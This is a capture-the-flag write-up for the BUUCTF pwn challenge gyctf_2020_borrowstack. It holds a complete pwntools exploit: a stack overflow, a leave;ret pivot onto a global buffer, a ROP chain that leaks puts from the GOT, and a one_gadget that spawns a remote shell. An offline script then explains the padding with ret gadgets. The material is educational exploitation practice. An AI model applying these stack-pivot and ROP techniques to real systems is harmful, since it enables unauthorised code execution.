[BUUCTF-pwn]——gyctf_2020_borrowstack
exploit
```python
from pwn import *
from LibcSearcher import *

p = remote('node3.buuoj.cn', 28602)
#p = process('./gyctf_2020_borrowstack')
elf = ELF('./gyctf_2020_borrowstack')
#libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
#gdb.attach(p, 'b *0x0000000000400676')
context.log_level = 'debug'

puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
main = elf.symbols['main']
bank = 0x0000000000601080        # global buffer filled by the second read(); becomes the fake stack
leave_ret = 0x0000000000400699   # leave ; ret
pop_rdi = 0x0000000000400703     # pop rdi ; ret

# Stage 1: overflow the 0x60-byte stack buffer, point the saved rbp at bank and
# return into leave;ret, which pivots rsp onto bank.
payload = b'a' * 0x60 + p64(bank) + p64(leave_ret)
p.recvline()
p.send(payload)

# Stage 2: the fake stack written into bank. The leading ret gadgets matter:
# `leave` pops the first quadword into rbp, and every further ret moves rsp
# 8 bytes deeper into bank, so when puts is called its stack frame (which grows
# downward from rsp) stays inside bank instead of overwriting the GOT and the
# other globals that sit in the writable data segment just below bank.
# Twenty is simply enough padding for that.
payload1 = p64(0x00000000004004c9) * 20 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main)
p.sendafter(b'now!\n', payload1)

# puts prints the 6 non-zero bytes of its own address; zero-extend to 8 bytes.
puts_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
log.success("puts_addr -----> :" + hex(puts_addr))

libc = LibcSearcher("puts", puts_addr)
libc_base = puts_addr - libc.dump("puts")
info("libc_base -----> " + hex(libc_base))
sys_addr = libc_base + libc.dump("system")
binsh = libc_base + libc.dump("str_bin_sh")
one_gadget = libc_base + 0x4526a   # one_gadget offset for the remote libc-2.23

# Round two (the chain returned into main): overwrite the return address with
# the one_gadget directly; the second read() just needs any input.
payload = b'a' * 0x60 + p64(bank) + p64(one_gadget)
p.sendafter(b'Tell me what you want\n', payload)
#payload1 = p64(0x00000000004004c9)*20 + p64(pop_rdi) + p64(binsh) + p64(sys_addr) + p64(main)
p.sendafter(b'now!\n', b'a')
p.interactive()
```

Aaaaaah, why do you have to add 20 rets? This kid doesn't understand, this kid wants to know.
Is this reasonable? This is not reasonable!!!
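The question at the end of the write-up, why the fake stack at bank is padded with `ret` gadgets, comes down to where rsp points when `pop rdi` finally runs. The following is an added example of my own (it is not code from the write-up or from the challenge) that models only the stack-pointer arithmetic of the pivot with plain `struct`, so it runs offline without pwntools or the binary. The constants are the ones used in the exploit above; puts@plt, puts@got and main are passed in as arguments because their values do not appear on this page, and the numbers used under `__main__` are placeholders.

```python
import struct

# Constants copied from the exploit above (non-PIE binary).
BANK      = 0x601080   # global buffer filled by the second read(); used as the fake stack
LEAVE_RET = 0x400699   # leave ; ret
POP_RDI   = 0x400703   # pop rdi ; ret
RET       = 0x4004c9   # ret
BUF_SIZE  = 0x60       # bytes from the start of the stack buffer to the saved rbp


def p64(v):
    return struct.pack('<Q', v)


def u64(b):
    return struct.unpack('<Q', b)[0]


def stage1_payload():
    """First read(): fill the buffer, saved rbp = bank, return address = leave;ret."""
    return b'a' * BUF_SIZE + p64(BANK) + p64(LEAVE_RET)


def stage2_chain(n_ret, puts_plt, puts_got, main):
    """Second read(): the fake stack written to bank. n_ret copies of `ret`, then
    pop rdi ; puts@got ; puts@plt ; main (leak puts, go back to main for round two)."""
    return p64(RET) * n_ret + p64(POP_RDI) + p64(puts_got) + p64(puts_plt) + p64(main)


def pivot_and_run(chain):
    """Emulate main's `leave; ret` with saved rbp == BANK, then every `ret` gadget
    the chain lands on. Returns (rip, rsp, rets_executed) at the first target that
    is not the `ret` gadget. Nothing is actually executed; this is bookkeeping only."""
    mem = {BANK + 8 * i: u64(chain[8 * i:8 * i + 8]) for i in range(len(chain) // 8)}
    rbp = BANK
    rsp = rbp            # leave: mov rsp, rbp
    rbp = mem[rsp]       #        pop rbp   <- swallows chain[0], it never executes
    rsp += 8
    rip = mem[rsp]       # ret: pop rip
    rsp += 8
    rets = 0
    while rip == RET:    # each ret gadget pops the next quadword into rip
        rip = mem[rsp]
        rsp += 8
        rets += 1
    return rip, rsp, rets


def headroom_in_bank(n_ret, puts_plt, puts_got, main):
    """Bytes of fake stack between the bottom of bank and rsp when `pop rdi` runs.
    puts's own frame grows downward from there; anything beyond this headroom
    spills below bank, onto the GOT and the other globals at lower addresses.
    Returns None when the chain derailed (pop rbp ate the pop rdi gadget)."""
    rip, rsp, _ = pivot_and_run(stage2_chain(n_ret, puts_plt, puts_got, main))
    if rip != POP_RDI:
        return None
    return rsp - BANK


def parse_puts_leak(data):
    """Same trick as recvuntil(b'\\x7f')[-6:].ljust(8, b'\\x00'): a user-space libc
    address printed by puts is 6 non-zero bytes ending in 0x7f; zero-extend to 8."""
    end = data.index(b'\x7f') + 1
    return u64(data[:end][-6:].ljust(8, b'\x00'))


if __name__ == '__main__':
    # Placeholder values: puts@plt, puts@got and main are not given on the page.
    PUTS_PLT, PUTS_GOT, MAIN = 0x400500, 0x601018, 0x400600
    for n in (0, 1, 20):
        rip, rsp, rets = pivot_and_run(stage2_chain(n, PUTS_PLT, PUTS_GOT, MAIN))
        print(f"{n:2d} ret quadwords: first non-ret target {rip:#x}, rsp {rsp:#x}, "
              f"{rets} rets executed, headroom {headroom_in_bank(n, PUTS_PLT, PUTS_GOT, MAIN)}")
```

Two things fall out of running it: with no padding the chain breaks before it starts, because `leave` pops the `pop rdi` gadget into rbp and the next `ret` jumps to puts@got; and with the write-up's 20 quadwords one is consumed by `pop rbp`, 19 rets execute, and rsp sits 0xa8 bytes above the bottom of bank when `pop rdi` runs, which is the room puts's frame has before it descends past bank into the GOT.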